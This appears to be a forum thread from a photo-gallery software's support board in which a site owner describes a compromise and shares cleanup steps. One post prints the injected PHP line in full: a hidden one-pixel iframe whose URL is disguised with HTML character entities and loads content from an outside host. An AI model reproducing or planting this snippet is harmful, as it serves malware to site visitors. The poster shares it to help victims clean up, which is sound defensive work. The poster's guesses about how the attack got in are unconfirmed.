There has been no indications or rumors that there is additional immediate vulnerabilities beyond what was closed in the 1.4.18 security release. Upgrade, sanitize, and cross your fingers...
-Tim
No need to go paranoid people
As Tim says. Update to 1.4.18 and you should be fine.
Kudos to Nibbler
Thanks guys for the advice... LOL I agree I went into a panic this morning when I saw it hit all of my sites; but believe I understand where they (moddys) are coming from in wanting to get it right to fix it; I work w/ a software company and I know we can't get our developers to fix anything if we can't tell them where its broken- no need to look through 10,000+ lines of code it would take them ages; so yes I totally understand and appreciate what the developers of cpg are trying to do here and only get valid info...... problem is those of us that are not coders don't know the difference and I knwo they can't teach us what is and what isn't LOL - but I am thinking the update.php may be part of it after re-reading the multiple pages in this thread if that how the attack originally gets the table names....
I can't get into my ftp or run the new upgrade until I am at home later tonight but here is what I am finding (sorry no logs or anything on this to support it just what I have seen and I apologize if its useless info but if it helps anyone I consider it worth posting so advance apologies to the moddys if this is indeed useless info)
Here is the bit of code I found that I am removing now (it is in every single php file in cpg and outside from what I am seeing)
<?php echo '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>'; ?>
So those of you that don't know what to do:
#1 ask your host to restore your entire website it is the safest and best way to be sure all malicious code is gone OR if you do not have backups then unfortunately you are like me and will have to salvage what you can start looking at the php files in cpg and if its the same type of attack look for a line of code like what I posted above; mine were located at the very end of the php file after all coppermine code- just be sure not to delete anythign else you don't know what it is
#2 upgrade your galleries to the latest release (.18 is it I think)
#3 Be sure you do not give more access to your files than you need to; I have a bad habit of chmodding to 777 when I upload file batches and I forget to set it back when I am done to 644 or 755
*** I say this because chances are thats how this loser was able to get in my sites was because of my own stupidity with the permissions- interestingly enough ALL of our sites on Windows servers have not been effected by this hacker as chmod is a unix command and permissions are set manually in the OS with Windows instead of through FTP like on a unix/ apache server - for once in my life I am seeing Windows be the safer option which I find unbelievable but it explains alot (IMHO) as I know how hosting via Windows works and all permissions are preset and not changeable via the ftp
